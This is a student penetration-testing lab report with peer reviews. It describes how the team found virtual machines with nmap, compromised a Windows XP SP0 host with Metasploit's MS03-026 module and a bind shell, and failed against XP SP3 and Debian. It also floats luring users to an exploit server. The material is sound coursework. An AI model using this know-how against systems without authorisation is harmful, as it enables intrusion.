Abstract
In this week’s lab we will analyze target hosts and choose exploit tools that will exploit them in as few attempts as possible. Because we’re disclosing the number of attempts taken, we will place additional emphasis on the tool selection process to keep the number of attempts low. In a real attack or penetration test, this would have the added benefit of reducing the amount of interaction with the host and potentially disclosing our attempts.
After testing the exploits we will analyze our attempts and review our successes and failures and what they mean in the broader scope of penetration testing. We will review the methods used and identify biases that may exist in current penetration testing techniques and exploit tools.
Literature Review
Over the past five lab exercises, we’ve compiled multiple tables based on various topics related to penetration testing. In the first lab we compiled a table of exploit tools and organized them according to the OSI layer they exploited. Once we identified tools to exploit each of the OSI layers, we needed ways to discover which layers were exploitable. In labs two and three we developed more lists of tools, again organized by OSI layer, allowing us to pick and choose which layers of a system we wanted to monitor and how we wanted to monitor them. Once the vulnerability has been discovered through reconnaissance, a tester needs to research the vulnerability using tools available to him such as online vulnerability databases and vendor security configuration guides. Research will lead to a better understanding of the vulnerability and allow the tester to pick the appropriate tool to exploit the network without causing any unnecessary network traffic that could reveal their efforts. Lab six focuses on selecting the proper tool for exploiting the target system the first time based on information collected using data gathered from the target system using methods developed in previous labs.
The bulk of the readings for lab six focus on the topic of vulnerability identification and exploitation using processes or methodologies. In (Mirkovic & Reiher, 2004) the authors create a highly detailed Distributed Denial of Service (DDoS) taxonomy. Their approach is to review known DDoS attack mechanisms and analyze how they were perpetrated and why. By analyzing known successful attacks, the authors can then look at the methods that were used to successfully or unsuccessfully defend against them. The authors identify an attack path used for DDoS propogation that will be similar to the one utilized in this lab. Through various scanning methods that the authors discuss (pp. 41-43) someone wishing to conduct a DDoS attack first gathers intelligence on the hosts that they can exploit. The primary methods involve vulnerability scans through active reconnaissance, something we researched in lab two. The authors do mention the possibility of spreading a worm through indirect communications channels such as Internet Relay Chat (IRC) but make no mention of the true benefits of this. The DDoS taxonomy is echoed by J.P. McDermott where, through the use of attack trees, we can model the DDoS attack process as seen in (McDermott, 2000, p. 19). McDermott shows how penetration testers can use attack trees to brainstorm about methods of exploiting their target systems instead of just relying on flaws or vulnerabilities. A similar approach will be considered in the lab exercises though, since the systems do not physically exist, we can only hypothesize how they could be compromised using methods other than vulnerability exploitation. A way of using the DDoS model of vulnerability discovery is seen again in (Chen, Yang, & Lan, 2007) except this time it is used for defensive purposes. One major flaw that is not discussed in their model is the security of the communication between the controller and agent. If this traffic is not encrypted, it could be subject to monitoring by other parties and used for attack coordination.
Since the attacks in this lab will be tested over a network, we’ll need to employ network topology analysis, similar to what is discussed in (Zakeri, Shahriari, Jalili, & Sadoddin, 2005), to analyze our targets properly. While the subnet in our virtual lab environments is flat, the principles discussed by Zakeri et al. are still highly relevant to our lab. They identify a model for vulnerability analysis of network hosts including operating system (OS), OS version, OS configuration, service information, service version, and many others (pp. 2-3). (Haeni, 1997) presents methods for performing discovery against a firewall. Since firewalls are nothing more than specialized computers and since one of our target hosts is an operating system running a firewall the methods described in his paper will be useful in the lab. Haeni discusses methods for identifying open ports on a firewall and for perpetrating attacks behind the firewall (pp. 19-20). It’s interesting to note that even though the paper was written over twelve years ago, many of the same methods are still valid against modern firewalls. This, more than likely, points to a flaw in both the insecurities of the TCP/IP protocol stack and the lack of security innovation on the part of the vendors. Even back in 1997, Haeni was criticizing firewall vendors for certifying their own products and declaring them “secure” (p. 7).
Once we’ve identified the operating system version we’re attempting to exploit, choosing the proper tool to perform the exploit depends on many factors. If the attacker is attempting to obfuscate their actions, they may employ a root kit or password cracking tool to gain surreptitious, high level access to the system. In (Kühnhauser, 2004), root kits are analyzed as methods of covering attacks. If an attacker can place a root kit on a system, they gain complete control over the system, including low-level system functions. By doing this they can alter system files, log entries, and network traffic to cover up their tracks (pp. 14-15). Another method of surreptitious entry to a system would be to crack the passwords of existing users as described in (Snyder, 2006). While the focus of the paper is more on developing a system for teaching students how to run password cracking programs, Snyder briefly mentions the ethical issues of teaching students how to crack passwords (p. 13). Other than some steps on running John the Ripper, the paper isn’t very useful as far as depth into the topic. Sentences such as “One should always make your password hard to crack” (p. 15) affirm this. Cracking passwords could be utilized for surreptitious entry into a system by impersonating a user, but only if using offline methods such as hash cracking. Brute forcing a website password would almost certainly tip off the system owner to suspicious activity and indicate a sloppy or unmotivated attacker.
Methodology
In order to test the full extent of the knowledge gained and tools discovered throughout this class, we opted to approach the lab six exercises as simulated red teaming exercise between our group’s two team members. One team member changed the IP addresses and passwords on three of the virtual machines in our lab environment, Windows XP SP0, Windows XP SP3, and Debian Etch. After that was completed, that team member shut down the team of virtual machines and notified the other team member that the work was completed. It was then up to the second team member to identify what the IP addresses were changed to, which IP address corresponded to which operating system version, and finally to exploit and gain access to the virtual machines.
Once all of the virtual machines were powered up, Backtrack was used, specifically nmap’s ping scanning feature, to quickly identify which IP addresses in our 24 bit subnet were responding to pings. Once the addresses had been identified, the known addresses of other virtual machines on the network were discarded from the list of results. We then used nmap to individually scan each of the IP addresses using the “-A” option for operating system identification. The two Windows systems returned their operating system returned their operating system versions along with open ports. The identification between the Windows system was also aided by the fact that the machines’ NetBios names were “XPSP0VM” and “XPSP3VM.” The Debian machine was not able to be identified through nmap. Nmap reported that there were too many OS fingerprints that matched, were were only able to identify it definitively through the process of elimination. While this method involved the use of active tools for identification of the systems, had the systems been in use, we could have monitored the network traffic for information on the host configurations. One of the best giveaways for host identification is the application layer traffic. Had these machines been actively used we could have used SMB and RPC traffic activity to identify the two Windows machines. Once identified, it would have been a process of elimination using active scanning methods to determine what operating system version was running. Another method of host identification would be browser traffic. While it could be spoofed, the BrowserAgent field, if captured in a network packet, would disclose the browser name and operating system version.
Once each of the hosts had been identified, we began to test exploit tools against each of them. The first target was the Windows XP SP0 machine with the known MS03-026 RPC vulnerability that is included by default with Metasploit framework that the team has experience exploiting. We configured Metasploit to use the “windows/shell_bind_tcp” payload and executed the attack, it was successful on the first try. Once the remote command shell was active we simply changed the passwords for the “user” and “Administrator” accounts. The change was verified by logging in to the machine through VMWare Workstation’s console though it could have been done through Remote Desktop as well.
For the Windows XP SP3 target, we first researched the date that Service Pack 3 was released. This gave us a baseline for future security vulnerabilities so we didn’t pick any that would have been patched with the service pack. Metasploit contains a built-in module for exploiting the vulnerability described in MS08-067. We executed that module, choosing the “Automatic Targeting” option instead of picking our specific operating system version to see how the tool behaved. For a payload we again chose the “windows/shell_bind_tcp.” The tool correctly identified the host as Windows XP Service Pack 3 (English) but hung “Triggering the vulnerability…” We attempted to test if the vulnerability had worked anyways by opening a telnet session on port 4444, the port we had configured for Metasploit to open for us, but the session was not open. We tested three more time suing different payloads, “generic/shell_reverse_tcp,” “generic/shell_bind_tcp,” and “windows/meterpreter/bind_tcp.” We ran nmap against the system to see what ports were opened. The only ports that returned in nmap were 135, 139, and 445 which generally indicates that the Windows firewall is turned on and is only allowing file and print services. Finally, we ran a Nessus scan against the machine and it did not detect the MS08-067 confirming remotely that it was patched. Next we attempted to exploit some Internet Explorer 7 vulnerabilities on the machine. Through reconnaissance of traffic on the machine it would be possible to determine the browser type in use, assuming though that we were remote, Internet Explorer 7 would be a good possibility. We set up our Metasploit on our test machine to open a port on 8080 that would inject code that exploits MS09-002. We pointed the browser of the XP SP3 machine to our exploit server’s IP address on port 8080. This could easily be targeted at the “real” user of the target machine through an e-mail or modified web page with a link to our exploit server. The exploit attempted the code injection but failed. Inspection of the XP SP3 machine revealed that Internet Explorer 8 was installed. While this could have been done before we even attempted the exploit, we wanted to test the behavior. After five hours of semi-blind testing we gave up.
Our Debian machine revealed little information from any scans we ran against it so we immediately ran a Nessus scan. The Nessus scan returned with no open ports or vulnerabilities. We examined the Debian machine and determined that it wasn’t running any services and since X Window or Gnome weren’t running, the system wouldn’t be very useful to a user. In order to increase the attack surface we installed Apache and an SSH server using “apt-get.” After installing both of those we ran an nmap scan against the system to verify that the ports were open and responding to remote requests. A Nessus scan against the system revealed that Apache had detailed system headers turned on. While this isn’t exploitable, if there were a vulnerability released for the specific version of Apache we are running, this could easily allow an attacker to identify our system as a potential target. Nessus revealed that the versions of Apache and ssh we were running did not have any remotely exploitable vulnerabilities. After 2 hours of attempting to create realistic vulnerabilities in a system we gave up.
Findings
Based on the labs exercises, we were able to successfully identify a tool that could immediately exploit our first system on the first try. The second system put our exploit tool identification skills to the test. While the system appeared to be vulnerable based on operating system version and ports open, further testing revealed that the system had been patched. This forced us to rethink our attack strategy from known vulnerabilities with published exploit code to other means. Through social engineering, it would be possible to direct the user of a system to a malicious web server hosting exploit code that would inject into the browser and give us remote access. We attempted to do this using Metasploit and the MS09-002 vulnerability but the exploit failed because, as we found out after the test, Internet Explorer 8 was installed on the machine. Our Debian target machine proved even more difficult with no open ports. We attempted to create exploitable vulnerabilities through installing additional software but did not have any success.
All of the exploit tools used exploited remote connection capabilities in the target systems. In most circumstances the attacker or penetration tester will be running their attacks across a network. As seen with the Windows XP SP3 machine, firewalls can make this more difficult. A firewall can block certain attacks but let other ones through. Even with the firewall enabled on our XP SP3 machine, had it not been patched, allowing file and print sharing through the firewall would have allowed us exploit the MS08-067 vulnerability. Since most of the tools exploit the remote systems anywhere from OSI layer three and up, the tools reflect this bias by heavily targeting exploits that can be run remotely. We believe that this may leave attacks that could be run locally on a machine by an insider or someone who has gained physical access out of many penetration testing reports.
Exploiting the lower layers of a system such as spoofing packets reveals weaknesses in the TCP/IP and OSI models. There is an implicit level of trust by higher layers of lower layers by design. The application layer doesn’t necessarily care about TCP ports, it assumes that this is handled by programs responsible for that layer. If a packet is spoofed at the IP level, the application level will assume that it came from a valid source because layers three through six passed it up the stack as they should have. The application does its job and passes the packet back down the stack. Mistrusting the lower layers would break down the reason for having them in the first place so a balance must be struck or the whole system falls apart. A risk analysis of a vulnerability should include a classification based on the OSI layer that the vulnerability impacts so systems administrators can identify the cascading failures in higher levels that could result from a successful exploitation of the vulnerability.
Conclusion
This lab showed us how to analyze a remote host and choose exploit tools to attack that host. We learned through our testing that failure isn’t always a bad thing, it just means that the attack method we chose has been accounted for and mitigated or patched. Instead of indicating that the host isn’t exploitable, a failure simply narrows our focus even further. We saw through the literature that through reconnaissance and development of attack plans, attack trees, or studying exploit taxonomies we can narrow the focus of our exploits with little to no interaction with the target hosts.
While remote exploitation may not always be possible, vulnerabilities still exist. It’s only a matter of time before another one is found and exploit code is published. Our findings indicate that exploitations in lower layers of the OSI layer lead to compromise of the higher layers of the system. Because of the way current systems are designed, this type of attack would be very difficult if not impossible to defend against.
Works Cited
Chen, S.-J., Yang, C.-H., & Lan, S.-W. (2007). A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test. Paper presented at the The 2007 Symposium on Cryptography and Information Security.
Haeni, R. E. (1997). Firewall Penetration Testing. The George Washington University Cyberspace Policy Institue.
Kühnhauser, W. E. (2004). Root Kits: an operating systems viewpoint. SIGOPS Operating Systems Review, 38(1), 12-23.
McDermott, J. P. (2000). Attack Net Penetration Testing. Paper presented at the Proceedings of the 2000 Workshop on New Security Paradigms.
Mirkovic, J., & Reiher, P. (2004). A Taxonomy of DDoS Attack and DDoS Defense Mechanisms. SIGCOMM Computer Communications Review, 34(2), 39-53.
Snyder, R. (2006). Ethical hacking and password cracking: a pattern for individualized security exercises. Paper presented at the Proceedings of the 3rd annual conference on Information security curriculum development.
Zakeri, R., Shahriari, H. R., Jalili, R., & Sadoddin, R. (2005). Modeling TCP/IP Networks Topology for Network Vulnerability Analysis Sharif University of Technology.
This group’s abstract only gives a summary of what is involved in this lab. This abstract could have been expanded to include more on what is the purpose of this lab and how it is related to the rest of the course. In the literature reviews for this group, they start off with summarizing up all the labs up to and including this lab and give an overview of the entire course. This whole section could have been summarized and placed in the abstract of this lab. This section did not pertain to any of the readings. The rest of the literature reviews examine how each of the articles fit into this lab and how they relate to each other. The group does a very good job at this in the literature review, but they do not review each article individually. Cense the group does not review the articles individually they do not discuss any methodologies of the papers or research done by the writer. The group does expose some discrepancies in the articles and clarifies them. This group approached the lab with a different means than everyone else in the class. In the methodology the group describes that the group set up this lab as a simulated red teaming exercise between the two members of the group. One of the members changed IP addresses and passwords and the other attempted to discover IP addresses and associate them to operating systems. The team used a Windows XP SP0 system, Windows XP SP3 system, and a Debian Etch system as there three test computers. They used a fourth machine with Backtrack installed on it to be used as the attacking computer. In the methodology the group used Nmap to determine what the operating systems were. This goes against the rules of the lab exercise. The lab states that the gathering of information about the operating system needs to be done passively. The group does explain how this could have been done passively though. Throughout the methodology the group does a very good job in explaining each step and how they configured each of the tools and exploits to get the results they needed. The group did include a lot of results in the methodology section of this paper. They could have just given the method that they were going to follow and then explain in the findings what happened when they attempted the different exploits. The findings section seemed to just rehash what was already said in the methodology section of this paper. The second part of the findings in this paper explains how firewalls even can be used to exploit a network if they are not patched properly. Also noted was that remote services are the bias for most of the exploits out in the world. The last statement in this section talks about leaving attacks that can be ran locally on a machine by insiders or others that have gained physical access. This was after explaining that the tools have a bias toward remote exploits. These statements seem to be contradicting themselves. How can a remote exploit be a local attack by a local user? Last the group explains that higher layers in the OSI model have a trust in the lower layers. They say that this would mean that if an attack happens at a lower layer the upper layers will not know about the attack and be compromised. One question that I have is what happens when you introduce encryption into the lower layers though?
Team five begins their lab with the abstract that explains an overview of the steps that will be accomplished in the lab. Unlike previous abstracts, this one meets the requirements of the syllabus including the two-paragraph length. The literature review that team five presents for lab six demonstrates a high level of cohesion between the articles as well as high level of understanding of the topics presented. They also do a good job of relating the topics of the literature review to the exercise of the lab. One team five is done with their literature they explain the methods they will use to complete the steps of the lab. They explain in their methods that in order to prepare for lab seven one team member changed IP information on the VMs and afterwards the other team member had to fingerprint the VMs in order to attack them. They start by performing a ping scan. While I see this a needed step, is does violate the passive nature of the first few steps of the lab design document. A ping scan is a generally a dead give away to an attack. Making use of the new version of NMAP was a very nice touch, and one that other teams did not make use of. The rest of their methods section detailed the majority of steps they were going to follow. Some of the information they presented in the methods section, like most of the teams, did belong in the findings section. They list exploits actually attempted in the methods section, which in my opinion is not correct. However I do enjoy the discussion around the varied nature of the exploits they attempted. In the findings section they explain that like the other teams they were only able to exploit the Windows XP SP0 machine, however they did mention the actual exploits they attempted, including updated and current exploits that are part of the metasploit framework. I do not see any discussion about the total number of exploits attempted before achieving success or failure. Again, like the other teams, they were only able to exploit the XP SP0 machine. Like team two, once they discovered that the Debian machine had no running daemons they did not just give up. While not directly listed in the lab design document, adding services to the Debian machine shows a very scholarly level of involvement in the outcome of their lab. This lends credence to their results. Even though there were obviously issues with their lab, there is no issues section to be found. This is a direct violation of the syllabus as per the lab report design. I do not totally agree with a “trust” model placed between the layers of the OSI model as it pertains to the implementation of the model in a computer system. The addition of the windows firewall is a direct result of the no trust nature of the layers of the OSI model in my opinion. Even though the firewall is technically a layer seven application, it interacts as low as layer two of the OSI model. I agree with the conclusions presented by team five.
The team had a nice introduction in their literature review, nicely summing up the past labs and telling the audience how they have all added up to this lab experiment. Like other teams this team had very long paragraphs in the literature review. For the first time in any lab report, lab 6 by team 5 was the first to make the entire lab report sound like one person. Was this because only one person wrote the lab report, using information from the other member, and rewriting it for cohesiveness? The approach of having one team member change IP addresses and then having the other one perform a penetration test on the systems is very unique. I like this approach that this team took, why are they the only ones to think about performing the lab this way? It seems like many teams did not bother to attack the Debian machines, is this because other teams do not know how to attack a non-windows machine?
I think that this team had one of the most detailed methods section of all the teams. It is nice to see that this team was able to admit that they could not compromise some of their systems, and eventually gave up. So there was no number of times it took to compromise the system, since they never did. Like other teams, this team realized the reason why the it was difficult to compromise the system. No services are running, no users are using it. Basically it is a clean system. So to me, this means that adding functionality to a system, makes it more vulnerable. I have to ask, where is the Issues section? Was it that this team had no issues, or that the team did not have time for the issues? The lack of an issues section is an issue, but where do you put that? What a catch 22. After seeing other teams have screenshots of their lab experiment, I would like to have seen some from this team. Screenshot can add to the ability to duplicate the lab that the team performed. Overall this is a good lab, but not one of the better labs that this team has written. I hope to see the findings from this lab help this team, and all teams, with the next lab experiment.
Team 5 begins their lab report by stating their objectives; to exploit the target hosts in as few attempts as possible. They intended to do this by placing additional emphasis on the tool selection process. They state that the added benefit would be a lowered interaction with the target host and therefore less chance of detection.
In the first paragraph of the literature review, Team 5 reviewed all of the labs that they had completed up to this point. They then stated that the focus on lab 6 is selecting the proper tool for exploitation on the first try. Although it appears to be the introductory paragraph for the literature review, it didn’t introduce the literature review or tie the literature review with the lab assignments.
They proceeded to review A Taxonomy of DDoS Attack and DDoS Defense Mechanisms (Mirkovic & Reiher, 2004). They related this article to lab 6 in the way that the author studied previous attacks and current vulnerabilities to create a plan prior to conducting the attack. They also related the lab to Attack Net Penetration Testing (McDermott, 2000) by discussing how penetration testers can model the penetration using attack trees. They mentioned the article A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test (Chen, Yang, & Lan, 2007) and state that it uses the DDoS model; however they don’t explain how it fits this model. Perhaps they are comparing the handler-agent design of the DDoS with distributed computing system described by Chen, Yang, & Lan. They do however make a good point concerning the communication within the Distributed Network Security Assessment tool. If the data transferred between the agent and controller within the distributed system is not encrypted, it may cause information leakage to someone who is passively sniffing on the network.
They discuss Modeling TCP/IP Networks Topology for Network Vulnerability Analysis (Zakeri, Shahriari, Jalili, & Sadoddin, 2005) and discuss how it is a model for vulnerability analysis. They point out that it could be beneficial in this lab by providing a technique for modeling the system to determine vulnerabilities. Likewise they discussed Firewall Penetration Testing (Haeni, 1997) and how the methods described, such as attacking behind a firewall, will be beneficial in conducting lab 6.
In the methodology section, Team 5 stated that they intend to conduct lab 6 as a simulated red team exercise between the two members of Team 5. One team member changed the IP addresses and passwords of the target machines so that the other team member could attempt penetration. They began with nmap to discover the target systems. Team 5 makes a good point that if the machines had been in use they would have been able to identify them passively through network traffic. They successfully exploited the Windows XP SP0 machine using the MS03-026 exploit and the shell_bind_tcp payload. They planned their attack against the Windows XP SP3 VM by first determining the date that service pack 3 was released and finding vulnerabilities that were discovered since then. They were unsuccessful in compromising the system. Team 5 made a good point that had the system been in actual use, they may have been able to target the system by placing malicious code in a web page or email. Likewise they were unable to find any exploits against their Debian machine, even after installing an Apache and SSH server.
Team 5 makes a good point that the systems are overly secure due to the lack of applications that are running and the lack of human interaction within the target systems. Our own research has shown that many of the known vulnerabilities occur within the application layer of the OSI model, and many require human interaction on the target system.
Team 5’s abstract was well written and set the stage for what they were going do in lab 6. The team did a nice job with their introduction and writing a cohesive literature review in that they tied their lit review back to previous labs. This was good because it shows an understanding that this course has been set up for each lab to build upon the previous lab. I thought the approach team 5 took with one team member changing the IP addresses and passwords on three of the virtual machines and then notifying the other team member that the work was completed, so that the second team member could identify what the IP addresses were changed to was truly a team effort.
Team 5 had one of the most detailed methods sections of all the teams. Their findings section was very detailed as well and helped me top understand more about this topic. I didn’t see any issues so I have to ask, were there any? Overall this is a good lab, well written and cohesive.
In the abstract section of the laboratory report, team five viewed the constraints of the assignment as successfully exploiting the designated targets in as few attempts as possible, thus making tool selection a crucial element in the success of such an objective.
In the literature review section of the laboratory report, team five was able to intertwine the different articles to create a cohesive explanation of denial of service (DoS) and penetration testing. The only problems I could find with the section were that the summaries of the articles were very brief and the articles were not always related to the laboratory assignment. Team five was able to relate the denial of Service (DoS) article to the lab assignment by stating “The authors identify an attack path used for DDoS propagation that will be similar to the one utilized in this lab. “Team five also found that password cracking article was of poor quality when they stated “Other than some steps on running John the Ripper, the paper isn’t very useful as far as depth into the topic.”
In the methodology section, team five split their team in half and one group member changed the IP addresses and passwords of the Windows XP SP0, Windows XP SP3, and Debian Etch virtual machines. When the group stated “After that was completed, that team member shut down the team of virtual machines and notified the other team member that the work was completed“ I was somewhat unclear of this statement, for why would one shut down the virtual machine that the other team members would need to access? The group then used nmap to identify the operating systems on the virtual machines. Group five was able to exploit Windows XP service pack 0 with metasploit just as all of the other teams. Just like all of the other groups, team five was unable to exploit Windows XP service pack 3. The group also was unable to exploit Debian even when it was implemented with Apache server.
The findings section of group five’s laboratory report showed that the group came to the realization that there are limits on the effectiveness of the tools that all of the groups have been so heavily reliant upon. Group five just as some of the other groups including my own have realized that some of the layer eight techniques are beginning to look pretty appealing now. Group five stated “Through social engineering, it would be possible to direct the user of a system to a malicious web server hosting exploit code that would inject into the browser and give us remote access. “
In the conclusion section, I had to agree with team five when they stated “Instead of indicating that the host isn’t exploitable, a failure simply narrows our focus even further” This reminds me of what was said by Thomas Edison when he said that he did not fail, he just found numerous ways not to make a light bulb .The group also concluded that lower layer attacks would be harder to defend against.
I thought overall this team’s report to be quite excellent. The literature review was clearly superior, in my opinion. The methodology was well described, displaying considerations which with substantial thought underlying them. I especially was impressed by the experimental design, which used members of the group in a ‘blind test’ setup. I think this indicates a high degree of cohesion and cooperation among the team members: this is something other teams should seek to emulate.
Despite the overall excellent nature of the write-up, a few omissions and oversights appear to be present. Foremost, while I cannot criticize the ‘blind user’ setup, as it appeared to be well conceived, I do wonder if the methods used for the first two hosts were really an attempt at ‘passive’ reconnaissance. Despite having the advantage of user generated traffic by which to fingerprint hosts, this team resorted to using ‘nmap’ to actively interrogate the targets. This seemed totally unnecessary, as simple sniffing tools would have produced equally useful results. It was not mentioned if ‘nmap’ was run at a slow scan rate; if it was, I would likely consider this ‘passive enough’ and withdraw my criticism: this should have been discussed in the methodology in any case.
I thought it interesting that the team mentioned identifying the browser type by traffic. I would suggest that this is probably a method prone to error if HTML headers are being used for identification. It is well known that many browsers ‘lie’ with regard to this; in fact many allow the user to set the browser ID string to any number of commonly used configurations (such as Opera, Firefox via plug-ins, and I believe Konqueror also) . If HTML injection is being done, it might be better to utilize Javascript or CSS processing behavior characteristics (a common technique in web design) to determine browser type: this is usually quite accurate. This is just a suggestion, and not really a criticism: I found this teams research to be quite interesting with regard to this topic.
Furthermore, I do question the wisdom of tampering with a test system once the experiment has begun. Installing Apache on the Linux machine seemed a somewhat controversial choice. To be ‘fair,’ why not install Apache on Windows XP SP3 also, as it is cross platform. It just appears that the ‘baseline’ of functionality was not maintained across machine types. Additionally, why not attempt to browse the web from the Linux machine via a text based browser; or, install an X server and graphical browser so that similar exploits can be attempted across machine types. Really just a suggestion: these steps would necessarily require a fair amount of additional time to complete, which may not have been realistic in the test situation.
Finally, I note that while the discussion of the OSI layer compromise situation and the exploit/tool biases were relatively thorough, I did not see the team address the question regarding merit of NESSUS versus passive means as discovered in the exercise. Furthermore, I believe that some factors to be missing in the OSI layer exploit discussion. As the team asserts that there is ‘implicit trust’ among layers: what are the implications of good encryption techniques, whereby trust becomes explicit and reliable?
I think that group 5’s write-up for lab 6 was fair. The abstract for this lab was good and provided a good overview of the lab. The literary review was very good, in terms of summarizing the readings. Group 5 chose to write the literature review as one big comprehensive review, which is good; however most of the required questions were not answered. It seemed as if the literary review was nothing more than a summary of the required readings and did not include any speculation about the research methodology or any errors or omissions, though they did they indicate how it relates to the laboratory. All of the citing for the literary review was done well and all of the pages were included. For this lab, the group answered all of the required questions and provided a good amount of detail about the steps they performed to attack the target systems. However, there are some errors with the way the lab was performed. It appears that they did NOT use passive methods of OS detection, nor did they report the correct information about they active OS detection. The group used nmap instead of a passive scanner such as Ettercap or P0f. They also indicated that the –A argument was used to detect the OS’s when nmap uses the –O argument. This makes me wonder if they read the instructions correctly. However, their analysis of the ease of exploiting TCP/IP than the actual computer is a good a idea. This is very true as TCP/IP attacks can work against fully patched systems. The conclusion was well written and accurately summarizes what was covered. Overall, most of the required questions were answered and answered well; however, in the lab there seemed to be a little confusion how to perform passive scanning.
This team, like team 1, choose Windows XP Sp0, SP3, and Debian Etch. Unlike group one this team changed the IP address as an to attempt to mask the target clients from a different group member that was doing the testing. This shows a different approach that some attackers take. They may not know what they are targeting and must find out different information such as there IP address. This group used nmap to scan the network and locate the target clients. Nmap discovered the clients but similar to other scan tools used by other groups, discovering the operating systems is an educational guess. The Windows XP Sp0 was easily identified while the Debian and XP Sp3 system where given false or too many matches for an OS fingerprint. This team did something to different to exploit the Windows XP Sp3 system. They launched a web browser and took it to there web server that exploited there machine. What the same result would have happened if the web browser was different, say Mozilla Firefox with the add-on No Script? This type of an attack can be difficult to target users that the attack is unfamiliar with. Specifically attacking an unknown target node with this attack would be difficult. The Debian system was also attempted differently they used “apt-get” to install Apache and SSH. They soon discovered that this did not help any and where unable to exploit.
Team five’s report is well done and accurately describes what took place in the lab. The only place where it runs a bit thin is in the methods section.
Team five’s abstract is a quick overview of the lab. It could use more detail. What exactly are you doing to choose tools? What are the general steps in the process?
The literature review is well developed and relates the articles back to the lab as well as the class. It provides in-depth evaluative content. The articles are summarized so that the reader knows what they discuss, without trying to convey too much information.
The Methods section could be more detailed in order to provide a repeatable process. Some of the data contained in this section belongs in you findings. I’m curious as to why you deviated from the assignment.
The group’s findings are complete and well reasoned. Do you think that improvements could be made to the lab environment in order to more accurately reflect a real-world scenario?
The group’s conclusion accurately reflects the lab, and gives a good explanation of what was learned. The report is missing an issues section. Did you have any issues?